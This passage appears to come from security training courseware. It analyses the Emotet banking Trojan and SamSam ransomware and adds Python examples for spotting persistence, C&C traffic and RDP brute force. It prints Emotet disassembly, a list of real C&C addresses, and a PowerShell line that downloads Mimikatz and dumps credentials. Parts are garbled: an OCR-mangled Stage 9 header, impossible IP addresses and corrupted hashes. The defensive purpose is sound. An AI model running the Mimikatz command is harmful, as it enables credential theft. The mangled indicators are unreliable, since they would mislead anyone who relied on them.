Emotet is a revolutionary malware that is designed with a modular architecture, where the main programs are installed first before the delivery of other payloads. It is also considered as a dropper, a downloader, and a Trojan by security analysts. It is a polymorphic malware, as it can change its own identifiable features when downloaded so that it can elude signature-based detection and other antivirus programs. Emotet is usually a banking Trojan that can function both as a Trojan by itself or as the downloader and dropper of other banking Trojans. It has been employed as a dropper/downloader for well-known banking Trojans such as Zeus Panda Banker, Trickbot, and IcedID to infect victims globally. Although it is a Trojan, Emotet has advanced persistence techniques and wormlike self-propagation abilities, which make it uniquely resilient as a destructive malware that could jeopardize individuals, companies, and government entities globally.
Propagation
Emotet usually spreads through macro-enabled document files, malicious scripts, malicious links, and spam emails (malspam). It can run on port numbers 20, 22, 80, and 443. Emotet can persuade victims to click malicious links using eye-catching captions such as "Your Invoice" and "Payment Details." Early versions of Emotet arrived as a malicious JavaScript file. The latest versions use macro-enabled documents for retrieving the malicious payload from command-and-control (C&C) servers controlled by attackers.
Emotet Malware Attack Phases
The various phases and corresponding stages involved in an Emotet malware attack are as follows:

Figure 7.93: Emotet infection flow process

Emotet Malware Attack Phases: Infection Phase

Infection Phase
▪ Stage 1: Initial Infection
Initial infection occurs through macro-enabled document files, malicious scripts, malicious links, and spam emails. The spam email is sent to the victim with a malicious URL and it is disguised as a legitimate email, thereby luring the victim into clicking the link.

Figure 7.94: Spam email with malicious content distributing Emotet

▪ Stage 2: Malicious .doc File Download
When the victim clicks the link, it redirects to download a malicious .doc file. Thus, the Emotet malware enters the victim's system and starts its attacking process. The original filename of the infected document is PAY09735746167553.doc and it contains malicious VBA (Visual Basic for Applications) code in a macro. The VBA code comes as part of the malicious MS Office document. As soon as the macros are enabled, the code executes in the background. The malicious VBA code is automatically executed using its "autoopen" function once a victim clicks the button "Enable Content". Then, after some time, it generates a ton of PowerShell code and executes it. The actual Emotet file is downloaded by the generated PowerShell code from several URLs, which are generated dynamically.

Figure 7.96: Emotet downloaded and executed in PowerShell code
Emotet Malware Attack Phases: Maintaining Persistence Phase

Maintaining Persistence Phase
▪ Stage 3: Emotet Relocation and Creation of First culturesource.exe
By default, Emotet malware will be downloaded in the %temp% folder. When it runs, it compares the file path of the current process, and if it is not the same as %LocalAppData%\culturesource\culturesource.exe, it moves the original .exe file from the %temp% folder to the previously mentioned folder, and the file is renamed as culturesource.exe. The word "culturesource" is a constant string decrypted from memory.
The API SHFileOperationA is called to perform the file relocation. This API is called in a timer callback function, which we shall discuss later. The related assembly language (ASM) code snippet is as follows:

    002FFB9A loc_2FFB9A:                              ; CODE XREF: sub_311D78+1F3
    002FFB9A        call    ds:memset
    002FFBA0        call    sub_2F1250               ; CreateDirectoryW
    002FFBA5        push    1Bh
    002FFBA7        lea     eax, [ebp-20h]
    002FFBAA        push    edi
    002FFBAB        push    eax
    002FFBAC        call    ds:memset
    002FFBB2        add     esp, 18h
    002FFBB5        mov     dword ptr [ebp-1Ch], 1   ; FO_MOVE
    002FFBBC        lea     eax, [ebp-20h]           ; SHFILEOPSTRUCTA structure
    002FFBBF        mov     dword ptr [ebp-18h], offset unk_3083F8  ; current file path in %temp% folder
    002FFBC6        mov     esi, 0F14h
    002FFBCB        mov     dword ptr [ebp-14h], offset word_307EE0 ; %LocalAppData%\culturesource\culturesource.exe
    002FFBD2        mov     [ebp-10h], si
    002FFBD6        push    eax
    002FFBD7        call    ds:SHFileOperationA
    002FFBDD        test    eax, eax
    002FFBDF        jnz     short loc_2FFBEA
    002FFBE1        cmp     [ebp-0Eh], edi
    002FFBE4        jz      loc_2FFCA0

▪ Stage 4: Creation of Second culturesource.exe and Obfuscation
This is the main function of the Emotet malware attack, where the developers try to obfuscate the code by adding a large amount of unused text so that the original code is securely concealed.
In the previous stage, we have seen that the first culturesource.exe is relocated and executed; the second culturesource.exe file is employed in this stage for performing the major exploitation functions of Emotet. When the second culturesource.exe file
starts running normally, the first one exits. Now, Emotet dynamically releases code and the related data into memory blocks. Here, most of the functions are split into several parts to increase the complexity of the code analysis. As shown in the screenshot below, a normal function is split into seven parts, all of which are connected using "jmp" instructions, to make code analysis more difficult.

Figure 7.97: A normal function split into seven parts

▪ Stage 5: Encryption
All the strings are encrypted and then decrypted before being used during run time. All imported APIs are also encrypted and decrypted at the beginning of their execution. The screenshot below shows a code snippet that decrypts a string "user32.dll" from "unk_3031F0". It calls the API LoadLibrary to load "user32.dll" and then uses the decrypted API information to find the exported APIs in the module "user32.dll".

Figure 7.98: Decrypted string and loaded API from user32

▪ Stage 6: Deploying Timer Function
Emotet also uses a Windows Timer Event to execute its code. Here, it directly uses the timer callback function. When it calls the API SetTimer, it sets the interval time to 1000. This means that the callback function is called once every 1000 milliseconds. The pseudocode of this callback function is given below.

    void __stdcall Timer_fun(int a1, int a2, int a3, int a4)
    {
      unsigned int v4; // esi@6
      int v5; // eax@6
      unsigned int v6; // esi@15
      int v7; // eax@15
      int v8; // esi@16
      int v9; // eax@16

      if ( qword_307C94 <= (unsigned __int64)(unsigned int)GetTickCount() )
      {
        switch ( HIDWORD(qword_307C94) )
        {
          case 0:
            HIDWORD(qword_307C94) = 1;
            if ( check_process_is_in_correct_path() )   // sub_2F6BA0()
              goto LABEL_7;
            sub_2F7170();
    LABEL_7:
            v4 = GetTickCount() % 0xBB8u;
            v5 = GetTickCount();
            HIDWORD(qword_307C94) = 2;
            LODWORD(qword_307C94) = v4 + v5 + 3000;
            break;
          case 2:
            if ( sub_2F8300() && sub_2F8430() && sub_2F8820() && sub_2F9580()
              && sub_2FA320() && sub_2FB750() && sub_2F6800() )
            {
              dword_307CC4 = (int)&unk_3080E8;
              dword_307CC8 = 106;
              dword_307CCC = (int)&unk_303430;
            }
            v6 = GetTickCount() % 0xBB8u;
            v7 = GetTickCount();
            HIDWORD(qword_307C94) = 3;
            LODWORD(qword_307C94) = v6 + v7 + 3000;
            break;
          case 3:
            v8 = GetTickCount();
            v9 = sub_2FCB20();
            HIDWORD(qword_307C94) = 3;
            LODWORD(qword_307C94) = v9 + v8;
            break;
          case 4:
            SetEvent(dword_304C0C);
            break;
          default:
            return;
        }
      }
    }

In case 0, one of its purposes is to relocate the process to the expected position with the filename that was discussed in stage 3. Furthermore, in case 0, it is also coded to collect system information such as computer name, file system, and volume by calling several APIs, and the data are sent to the C&C server. This will be discussed in stage 7.
Another purpose is to set up a Windows service named "culturesource" for running Emotet at Windows startup, when it can open the Service Control Manager successfully (by calling the API OpenSCManager). Meanwhile, "culturesource.exe" is moved to the folder "%windir%\system32".

Figure: The "culturesource" service, whose startup type is "Automatic"

In the above code snippet:
▪ Case 1 is used to initialize several DLL modules and decrypt the exported API functions that Emotet uses, including "urlmon.dll", "wininet.dll", and so on.
▪ Case 2 is the main branch. It collects data from the victim's system, sends the data to its C&C server, and executes commands from the C&C server.
During this stage, Emotet maintains persistence using two methods: the system service and the auto-run in the system registry. Emotet creates the auto-run entry named "culturesource" under the following sub-keys in the system registry to maintain persistence and access the victim's machine even after reboot:
o HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
o HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
o HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Figure 7.101: Screenshot of the added auto-run entry "culturesource" in the Registry Editor
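The three Run keys listed above are the first place a responder looks for this kind of persistence, and the page gives the exact value name the sample used. The following is an added example, not code from the courseware or from Fortinet's write-up: it enumerates those keys (with winreg when run on Windows, otherwise it falls back to constructed sample entries), compares each value against a known-good baseline, and reports why an entry deserves attention, such as a value name matching the page's IoC or an image path under a user-writable directory like %LocalAppData%. The baseline, the sample entries, the OneDrive and SecurityHealth values, and the list of user-writable path markers are constructed; only the key paths and the "culturesource" name come from the page.

```python
"""Audit the Windows Run keys for auto-run persistence (added example)."""
import re

# The three auto-run sub-keys the Emotet analysis names.
RUN_KEYS = (
    "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
)
IOC_NAMES = {"culturesource"}  # value name used by the sample on the page
# Directories a standard user can write to (constructed list); an auto-run from here needs review.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\",
                 "\\users\\public\\", "\\programdata\\")


def image_path(command):
    """Pull the executable path out of a Run value, whether quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    match = re.match(r"(.+?\.(?:exe|dll|scr|bat|cmd|vbs|js|ps1))(?:\s|$)", command, re.IGNORECASE)
    return match.group(1) if match else command.split()[0]


def assess(key, name, command, baseline):
    """Reasons an entry deserves analyst attention; empty if it is baselined."""
    if (key, name, command) in baseline:
        return []
    reasons = ["not present in the known-good baseline"]
    if name.lower() in IOC_NAMES:
        reasons.append("value name matches the Emotet IoC")
    path = image_path(command).lower()
    if any(marker in path for marker in USER_WRITABLE):
        reasons.append("image lives in a user-writable directory")
    return reasons


def audit(entries, baseline):
    """Return (key, name, reasons) for every entry that is not fully baselined."""
    flagged = []
    for key, name, command in entries:
        reasons = assess(key, name, command, baseline)
        if reasons:
            flagged.append((key, name, reasons))
    return flagged


def read_live_entries():
    """On Windows, enumerate the three Run keys with winreg; elsewhere return []."""
    try:
        import winreg
    except ImportError:
        return []
    hives = {"HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE,
             "HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER}
    entries = []
    for key in RUN_KEYS:
        hive, _, subkey = key.partition("\\")
        try:
            with winreg.OpenKey(hives[hive], subkey) as handle:
                index = 0
                while True:
                    try:
                        name, value, _type = winreg.EnumValue(handle, index)
                    except OSError:
                        break
                    entries.append((key, name, str(value)))
                    index += 1
        except OSError:
            continue
    return entries


# Constructed baseline and observed entries; the culturesource paths follow the page's analysis.
SAMPLE_BASELINE = {
    (RUN_KEYS[2], "OneDrive", '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'),
    (RUN_KEYS[0], "SecurityHealth", "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
}
SAMPLE_ENTRIES = list(SAMPLE_BASELINE) + [
    (RUN_KEYS[0], "culturesource", "C:\\Windows\\system32\\culturesource.exe"),
    (RUN_KEYS[2], "culturesource", "C:\\Users\\alice\\AppData\\Local\\culturesource\\culturesource.exe"),
]

if __name__ == "__main__":
    for key, name, reasons in audit(read_live_entries() or SAMPLE_ENTRIES, SAMPLE_BASELINE):
        print(f"{key}\\{name}: " + "; ".join(reasons))
```

The baseline is deliberately a set of full (key, name, command) triples: a legitimate per-user application such as OneDrive also lives under %LocalAppData%, so the path heuristic alone would flag it, and it is the comparison against a clean image that keeps the report short. The system32 copy of culturesource.exe is caught only by the IoC name, which is why the service the text describes needs a separate check.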
Emotet Malware Attack Phases: System Compromise Phase

System Compromise Phase
▪ Stage 7: Communication with C&C Server
In stage 6, in case 0, it is coded to call several APIs and collect the system information such as computer name, file system, and volume by calling the APIs GetComputerNameW and GetVolumeInformationW. It puts the two data sets together and saves them in a global variable, which is used in the C&C server as the ID for this victim. This ID will then be used in the packets that communicate with the C&C server. Emotet then calculates a CRC32 of its EXE file and saves it in another global variable, which is used when sending the first packet to the C&C server.
It also calls "RtlGetVersion" to obtain the Windows version information and "GetNativeSystemInfo" to gather system and CPU information. Furthermore, it picks a DWORD value at offset 0x1D4 of the PEB, which is defined as SessionID. Emotet continues to collect the names of running processes by calling the APIs CreateToolhelp32Snapshot, Process32FirstW, and Process32Next.
The next step is to put all the collected data together into a structure and encrypt the entire data set. After the data are encrypted, it is encoded using Base64. Moreover, it then disguises the Base64 code as a cookie value of an HTTP header to avoid detection. Then, all this collected and encrypted information will be transferred to the C&C server.
The screenshot below shows that the data have been copied into a structure. The values in the red rectangle are flags that indicate what the following data are. The string behind "12" is the computer name, the data behind "18" is the native system information, and the byte after "20" is the SessionID from the PEB. The DWORD value next to "2D" is the CRC32 value of Emotet, the string following "32" is the collected process name list, and the value with a blue underscore is the length of the following data, which uses a type of UTF-8 encoding.

Figure 7.102: Put data together in a structure

After receiving the transferred information from the infected victim's machine, the C&C server checks if there are analysis tools (such as Wireshark and debuggers) running on the victim's machine. If any such tools are detected, it will not reply with any data; otherwise, it will provide the required malicious instructions and deploy the contagious payload. As can be seen in the screenshot, the C&C server replies with the instruction data.

Figure 7.103: Send collected data to C&C server

The IP list of C&C servers is hardcoded into its memory and saved in a global variable. Each IP and port pair uses 8 bytes, and there are 62 C&C servers in total. The list of hardcoded IP and port is as follows:

    01> 72.91.161.118 :: 22
    02> 70.164.196.211 :: 995
    03> 175.101.79.120
    04> 187.233.136.39 :: 80
    143
    05> 5.107.250.192
    06> 50.224.156.190 :: 995
    8080
    07> 5.107.161.71
    08> 186.179.243.7 :: 993
    995
    09> 72.240.202.13
    10> 190.215.53.85 ::
    80
    443
    11> 133.242.164.312
    12> 115.71.233.127 ::
    7080
    443
    13> 69.136.227.134
    14> 216.49.114.172 :: 22
    443
    15> 153.121.36.202 :: 7080
    16> 181.119.30.27 :: 995
    17> 710.164.196.211 :: 20
    18> 98.157.215.153 :: 80
    19> 62.75.187.192 :: 8080
    20> 189.234.165.149 :: 8080
    21> 154.72.75.82 :: 20
    22> 45.123.3.54 :: 443
    23> 217.13.106.160 :: 7080
    24> 75.99.13.124
    25> 198.74.58.47 ::
    7080
    443
    26> 69.195.223.154
    27> 172.114.175.156 :: 7080
    8080
    28> 73.124.73.90 :: 20
    29> 74.80.16.10
    30> 24.11.67.222 ::
    80
    443
    31> 181.143.53.227 :: 21
    32> 173.76.44.152 :: 20
    33> 208.78.100.202 :: 6080
    34> 47.44.164.107 :: 993
    35> 45.63.17.206 :: 2080
    36> 50.31.0.160 :: 8080
    37> 62.75.191.231
    38> 98.142.208.27 :: 8080
    443
    39> 78.187.172.138
    40> 67.205.149.117 :: 7080
    443
    41> 98.186.90.192
    42> §.230.147.179 :: 443
    8080
    43> 50.240.162.242 :: 995
    44> 94.76.200.114 :: 8080
    45> 178.62.37.188 :: 443
    46> 83.222.124.62 :: 8080
    47> 70.184.83.93 :: 20
    48> 173.255.196.209 :: 8080
    49> 208.107.230.235
    50> 186.179.80.102 ::
    20
    443
    51> 72.95.118.97
    52> 162.250.19.59 :: 22
    80
    53> 134.129.126.86 :: 443
    54> 69.198.17.7 :: 8080
    55> 8.17.46.42 :: 53
    56> 70.90.183.249 :: 7080
    57> 47.149.54.132 :: 8080
    58> 200.116.160.31 :: 80
    59> 175.143.84.108
    60> 178.254.31.162 ::
    50000
    8080
    61> 175.110.104.150 :: 20
    62> 211.115.111.19 :: 443
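Stage 7 gives a defender two concrete things to look for in the network monitoring data that the Network Traffic Monitoring/Analysis section earlier in this module describes capturing: a hardcoded list of C&C IP:port pairs, and an HTTP request whose Cookie header carries an encrypted, Base64-encoded victim profile. The following added example (not code from the courseware or from Fortinet) applies both checks to proxy-style log records. The six IP:port pairs are copied from the page's list above (entries whose port is printed on the same line); the log format, the source addresses, the benign destination, the 198.51.100.9 host and every log line are constructed for the illustration.

```python
"""Flag log records matching Emotet's C&C list or its base64-in-Cookie upload (added example)."""
import base64
import binascii
import ipaddress
import re

# IP :: port pairs taken from the hardcoded C&C list on the page.
EMOTET_C2 = {
    ("70.164.196.211", 995), ("50.224.156.190", 995), ("186.179.243.7", 993),
    ("172.114.175.156", 7080), ("217.13.106.160", 7080), ("45.123.3.54", 443),
}
# One long base64 token with at most two padding characters.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def is_base64_blob(cookie):
    """True if the cookie, or its value after name=, is one long valid base64 token."""
    _name, sep, value = cookie.partition("=")
    candidate = value if sep and B64_RE.match(value) else cookie
    if not B64_RE.match(candidate):
        return False
    try:
        base64.b64decode(candidate, validate=True)
        return True
    except binascii.Error:
        return False


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def parse_line(line):
    """Constructed log format: ts src dst dport method host uri cookie ('-' if none)."""
    ts, src, dst, dport, method, host, uri, cookie = line.split(maxsplit=7)
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport),
            "method": method, "host": host, "uri": uri, "cookie": cookie}


def triage(lines):
    """Return (timestamp, source, destination, reasons) for every suspicious record."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        reasons = []
        if (rec["dst"], rec["dport"]) in EMOTET_C2:
            reasons.append("destination matches a hardcoded Emotet C&C IP:port")
        if rec["cookie"] != "-" and is_ip_literal(rec["host"]) and is_base64_blob(rec["cookie"]):
            reasons.append("long base64 Cookie sent to a bare IP (Emotet-style disguised profile upload)")
        if reasons:
            findings.append((rec["ts"], rec["src"], f"{rec['dst']}:{rec['dport']}", reasons))
    return findings


# Constructed stand-in for the encrypted profile: any opaque bytes, base64-encoded.
BLOB = base64.b64encode(b"constructed-encrypted-victim-profile-bytes-0123456789").decode()
SAMPLE_LOG = [
    "2019-03-21T10:05:00Z 10.0.0.5 203.0.113.10 443 GET login.microsoftonline.com /common/oauth2 sid=abc123",
    f"2019-03-21T10:05:01Z 10.0.0.5 70.164.196.211 995 POST 70.164.196.211 / 8a1f={BLOB}",
    f"2019-03-21T10:05:02Z 10.0.0.7 198.51.100.9 7080 POST 198.51.100.9 / {BLOB}",
    "2019-03-21T10:05:03Z 10.0.0.5 172.114.175.156 7080 GET 172.114.175.156 / -",
]

if __name__ == "__main__":
    for ts, src, dst, reasons in triage(SAMPLE_LOG):
        print(f"{ts} {src} -> {dst}: " + "; ".join(reasons))
```

The IoC match is exact and therefore brittle (the list changes between samples), while the cookie heuristic is behavioural and survives a new C&C list; the third sample line is caught only by the latter. On real proxy logs the heuristic needs an allowlist of services that legitimately set long opaque cookies, but those are almost always addressed by hostname rather than by a bare IP on a non-standard port.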

▪ Stage 8: System Compromise
After receiving the malicious instructions or malicious payload from the malicious C&C server, Emotet upgrades itself and exploits the system. In this stage, Emotet actually compromises the victim's machine.
Emotet MalwareAttackPhases:
NetworkPropagation
Phase

Stage
9: Network Propagation,
(©
Ate infecting

(©
thevicki’
system, second kay
Emote’

spreader
Emoteuse ve known
currently, modules
goals tospreadtheinfection
aros
local
networks

Emotet
allsome
employsor
network ofthese
network target
machine modules
propagation onthe
depending and

‘Network Phase
Propagation
=

Stage 9: Network Propagation
After infecting the victim's device, Emotet's next key objective is to spread the infection across local networks and beyond to compromise as many machines as possible. Currently, Emotet uses five known spreader modules: NetPass.exe, Outlook Scraper, WebBrowserPassView, Mail PassView, and a credential enumerator.
- NetPass.exe: It is a legitimate utility developed by NirSoft. It recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
- Outlook Scraper: It is a tool that extracts names and email addresses from the victim's Outlook account and uses this information to send out additional phishing emails from the compromised account.
- WebBrowserPassView: It is a password recovery tool that captures passwords stored by web browsers such as Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. It can pass them to the credential enumerator module.
- Mail PassView: It is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail, and passes them to the credential enumerator module.
- Credential Enumerator: It is a self-extracting RAR file containing two components. One component is the bypass component, and the other is the service component. The bypass component is used for the enumeration of network resources, and it either finds writable share drives using the Server Message Block (SMB) or tries to brute-force

user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet's access to SMB can result in the infection of entire domains (servers and clients).
Emotet employs some or all of these network propagation techniques depending on the target machine and network. After infecting the possible machines in the network, Emotet performs the same phases as those discussed above to compromise the machines.
Indicators of Compromise (IoC) for Emotet:
This malicious Word document has been detected as "VBA/Agent.AFD!tr.dids" and the original Emotet file has been detected as "W32/Emotet.GBUK!tr" by the FortiGuard AntiVirus.

- URL
  hxxp://muathangnhom.com/6DOpkn0L9_yf0
  hxxp://gnevietnam.vn/abMbIaT2HsDkAq
  hxxp://augoclub.sk/yCq4xkYzeqAgK_v
  hxxp://foreprojects.webedge.com.ng/Le3UYxXyQixx_Dp
  hxxp://evonline.liceoriosdechile.com/NpDgofVhpankbq_18AaJbz93
- Sample SHA256
  PAY09735746167553.doc: 1194bab2c4aGe63e59e£01 6da30e713¢2
  Emotet/Original Downloaded Exe file: 7¢5cDC5B738F5D7B40 40F2CCOA730B61845B45CBC2A297BEE2D9506S7CABESS
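An IoC list like the one above is only useful once it is actually matched against what the hosts and the network produce. The following Python script is an added example rather than code from the courseware: it takes IoCs in the same three shapes as the list (SHA-256 hashes of dropped files, C&C IP:port pairs, and defanged URLs) and checks constructed file contents, flow records and proxy lines against them. Every indicator, address, domain and log line in it is a constructed placeholder (RFC 5737 documentation addresses, a made-up .test domain), not one of the page's real indicators.

```python
"""Match host and network observations against an Emotet-style IoC list.

Added example; all indicators below are constructed placeholders in the shape of
the courseware's list (detection name, SHA-256, C&C ip:port, defanged URL).
"""
import hashlib
import re
from typing import Dict, List, Tuple

# Constructed "dropped executable" bytes; its SHA-256 is the hash IoC we match on.
SAMPLE_EXE_BYTES = b"MZ\x90\x00constructed-emotet-placeholder-payload"

IOC_SHA256: Dict[str, str] = {
    hashlib.sha256(SAMPLE_EXE_BYTES).hexdigest(): "Emotet original downloaded exe (constructed)",
}
# C&C (ip, port) pairs; RFC 5737 documentation addresses, not real C&C servers.
IOC_C2 = {("192.0.2.10", 8080), ("198.51.100.7", 7080), ("203.0.113.5", 443)}
# Defanged URLs, as IoC feeds publish them (constructed domain).
IOC_URLS = {"hxxp://malicious-doc-host[.]test/abc_constructed"}


def refang(url: str) -> str:
    """Convert a defanged IoC URL to the form that appears in proxy logs."""
    return (url.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", "."))


def match_hashes(files: Dict[str, bytes]) -> List[Tuple[str, str, str]]:
    """Return (path, sha256, description) for every file whose hash is an IoC."""
    hits = []
    for path, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        if digest in IOC_SHA256:
            hits.append((path, digest, IOC_SHA256[digest]))
    return hits


# Constructed flow-record format: "<timestamp> <src_ip>:<sport> -> <dst_ip>:<dport> <proto>"
FLOW_RE = re.compile(
    r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*->\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")


def match_connections(flow_lines: List[str]) -> List[Tuple[str, str, str, int]]:
    """Return (timestamp, src_ip, dst_ip, dst_port) for flows to a known C&C pair."""
    hits = []
    for line in flow_lines:
        m = FLOW_RE.match(line)
        if not m:
            continue  # malformed record: skip it rather than abort the sweep
        ts, src, _sport, dst, dport = m.groups()
        if (dst, int(dport)) in IOC_C2:
            hits.append((ts, src, dst, int(dport)))
    return hits


def match_urls(proxy_lines: List[str]) -> List[str]:
    """Return proxy log lines that contain a refanged IoC URL."""
    wanted = {refang(u) for u in IOC_URLS}
    return [line for line in proxy_lines if any(u in line for u in wanted)]


# --- Constructed sample data ---
SAMPLE_FILES = {
    "C:/Users/victim/AppData/Local/Temp/updater.exe": SAMPLE_EXE_BYTES,
    "C:/Windows/System32/notepad.exe": b"MZ benign placeholder",
}
SAMPLE_FLOWS = [
    "2020-05-01T10:00:01Z 10.0.0.5:50213 -> 192.0.2.10:8080 TCP",
    "2020-05-01T10:00:02Z 10.0.0.5:50214 -> 198.51.100.200:443 TCP",
    "2020-05-01T10:00:03Z 10.0.0.7:50215 -> 203.0.113.5:443 TCP",
    "garbage line that does not parse",
]
SAMPLE_PROXY = [
    "10.0.0.5 GET http://malicious-doc-host.test/abc_constructed 200",
    "10.0.0.5 GET http://intranet.test/index.html 200",
]


def sweep() -> Dict[str, list]:
    """Run all three matchers over the constructed data."""
    return {
        "hashes": match_hashes(SAMPLE_FILES),
        "c2": match_connections(SAMPLE_FLOWS),
        "urls": match_urls(SAMPLE_PROXY),
    }


if __name__ == "__main__":
    for kind, hits in sweep().items():
        print(kind, hits)
```

Hash matching alone misses a repacked sample, which is why the network indicators (C&C destination and the download URL) are checked as well; in practice the three lists would be loaded from a feed rather than embedded.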

Virus Analysis: SamSam Ransomware
Source: https://www.secureworks.com
SamSam ransomware is also known as Samas or SamSamCrypt. It is a notorious ransomware that is associated with the GOLD LOWELL threat group for performing targeted attacks against global multi-national companies. It exploits vulnerable unpatched servers present in the target network using a range of exploitation methods. SamSam ransomware attacks skyrocketed in 2018, although the ransomware was developed and released in 2016. In 2018, it was shrewd enough to capture wide media attention by targeting a specific range of top-class organizations across the globe. Unlike other ransomware, this ransomware does not attack the victims on a random basis. It is a targeted ransomware that specifically targets certain reputed companies. In spite of knowing this, large multi-national companies were unable to defend themselves against this attack. This ransomware not only affected the operations of government organizations, schools, and the healthcare sector but also affected common people by encrypting their crucial medical records required for proper diagnosis. As with any other ransomware, after infiltrating into a system, it encrypts the files and prevents the users from using those files until a heavy ransom is paid in bitcoins. This ransomware does not have a specified ransom pricing. After infecting systems, the attackers demand a ransom depending on the type of victim.
Propagation:
Nearly all ransomware uses spam emails to propagate and perform attacks; however, SamSam ransomware employs brute-force tactics against weak passwords of the Remote Desktop Protocol (RDP) to gain access to the victim's machine. Once the target host is infected, it performs network mapping to search for other exploitable assets in the network.

Encryption:
SamSam adopts the RSA-2048 asymmetric encryption technique to encrypt local files in infected systems.
Symptoms:
A ransom note appears on the screen, demanding a ransom in bitcoins.
Structure:
The SamSam ransomware mainly consists of the following components:
- Batch file: The batch file is responsible for executing the malware.
- Runner: The runner component tries to perform decryption, and the payload is then executed.
- Decryptor: It tries to decrypt the payload, which is placed in a separate DLL file. Then, the key will be generated from the password provided by the attackers.

SamSam Ransomware Attack Stages
SamSam ransomware attacks occur in three phases:
- Pre-Exploitation Phase
- Exploitation Phase
- Post-Exploitation Phase

Figure 7.104: Stages in SamSam Ransomware attack
Pre-Exploitation Phase
- Stage 1: Gains Access to Vulnerable Servers
  In the initial stage of the pre-exploitation phase, the SamSam ransomware attackers check for the presence of unpatched RDP vulnerabilities in Internet-facing remote servers to gain an initial foothold in the victim's network.
- Stage 2: Harvests Admin Credentials
  Since SamSam ransomware creators are capable and efficient in combining commodity and proprietary tools with publicly available exploits and techniques, once they identify vulnerable unpatched servers with the RDP protocol, they employ brute-force tools (Mimikatz or NLBrute) to harvest the admin credentials and perform privilege escalation.
  It has been found that the attackers mainly use PowerShell commands to call Mimikatz from an online PowerSploit repository.

  powershell (New-Object Net.WebClient).DownloadString('https://raw.githubuse...imikatz.ps1');Invoke-Mimikatz -DumpCred
  Figure 7.106: Screenshot displaying PowerShell command to download Mimikatz
- Stage 3: Spreads Infection
  Once the attackers get admin access, they perform reconnaissance of the compromised network infrastructure using custom scripts or SystemTools' Hyena tool. They also create SOCKS proxies to tunnel the traffic and exploit legitimate admin tools such as PsExec, WMI, and RDP to spread and execute SamSam on the rest of the computers present in the network.
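SamSam's initial access (Stage 1) and credential harvesting (Stage 2) both rest on guessing RDP passwords, which leaves a dense trail of failed logons on the targeted servers. Below is an added detection example in Python, not part of the courseware or of any vendor tool: it counts failed remote logons (Windows Event ID 4625, logon types 3 and 10) per source address in a sliding window and reports any account from the same address that logs on successfully (Event ID 4624) after the burst. The CSV-like export format, the event records, the five-minute window and the threshold of ten failures are constructed assumptions to be tuned per environment.

```python
"""Spot RDP password guessing in Windows failed-logon events (constructed sample).

Added example; not from the courseware. Assumes events have been exported as
'timestamp,event_id,logon_type,user,src_ip' lines (an assumed export format).
Event 4625 = failed logon, 4624 = successful logon; logon type 10 =
RemoteInteractive (RDP), type 3 = network (NLA pre-auth failures show up here).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Event = Tuple[datetime, int, int, str, str]


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.strip().splitlines():
        ts, eid, ltype, user, ip = line.split(",")
        events.append((datetime.fromisoformat(ts), int(eid), int(ltype), user, ip))
    return events


def detect_bruteforce(events: List[Event],
                      window: timedelta = timedelta(minutes=5),
                      threshold: int = 10):
    """Return one alert per source IP that produced >= threshold failed remote
    logons inside any sliding window:
    (src_ip, window_start, failures, distinct_users, users_that_later_succeeded)."""
    failures: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    successes: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, eid, ltype, user, ip in sorted(events, key=lambda e: e[0]):
        if ltype not in (3, 10):
            continue                      # only remote logons are of interest here
        if eid == 4625:
            failures[ip].append((ts, user))
        elif eid == 4624:
            successes[ip].append((ts, user))

    alerts = []
    for ip, fails in failures.items():
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1                # slide the window forward
            if end - start + 1 >= threshold:
                users = {u for _, u in fails[start:end + 1]}
                burst_end = fails[end][0]
                later_success = sorted({u for t, u in successes[ip] if t >= burst_end})
                alerts.append((ip, fails[start][0], end - start + 1, len(users), later_success))
                break                     # one alert per source; a SIEM would dedupe similarly
    return alerts


def constructed_events() -> str:
    """Build the sample: a 12-attempt burst with a later success, plus normal typos."""
    base = datetime(2018, 3, 1, 2, 0, 0)
    users = ["administrator", "admin", "backup_admin", "guest"]
    rows = []
    for i in range(12):                   # 12 failures in 110 seconds from one source
        ts = (base + timedelta(seconds=10 * i)).isoformat()
        rows.append(f"{ts},4625,10,{users[i % 4]},203.0.113.44")
    rows.append(f"{(base + timedelta(minutes=3)).isoformat()},4624,10,backup_admin,203.0.113.44")
    for i in range(3):                    # three scattered failures: a user mistyping, not a brute force
        ts = (base + timedelta(minutes=20 * i)).isoformat()
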